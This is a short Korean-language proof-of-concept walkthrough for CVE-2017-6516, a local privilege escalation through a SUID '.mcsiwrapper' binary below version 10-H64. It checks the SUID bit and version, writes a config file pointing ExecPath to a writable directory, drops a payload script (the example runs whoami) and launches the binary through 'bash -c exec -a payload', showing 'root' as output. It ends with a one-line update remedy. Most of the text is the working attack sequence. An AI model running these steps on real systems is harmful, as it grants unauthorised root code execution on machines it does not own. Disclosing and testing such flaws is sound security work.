
CVE-2017-6516을 악용하기 위한 PoC/방법론
CVE-2017-6516은 MagniCorp SysInfo의 .mcsiwrapper 바이너리 중 10-H64 미만 버전을 대상으로 하는 권한 상승 취약점입니다. 이 바이너리에 SUID 비트가 설정되어 있고 버전이 오래된 경우, 사용자는 바이너리 소유자(대개 root)의 권한으로 임의 코드를 실행할 수 있습니다.
.mcsiwrapper 바이너리에 setuid가 설정되어 있어야 합니다:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper 바이너리 버전이 10-H64 미만이어야 합니다:$ .mcsiwrapper --version
<Version under 10-H64>
다음 내용으로 config 파일을 생성합니다:
ExecPath=<Path to a writeable directory>
ExecPath 디렉터리에 실행 가능한 페이로드 파일을 생성합니다. 예를 들어:
#!/bin/sh
whoami
그리고 실행 권한을 부여합니다:
$ chmod +x payload
다음 명령을 실행합니다:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
.mcsiwrapper를 최소 10-H64 버전으로 업데이트합니다.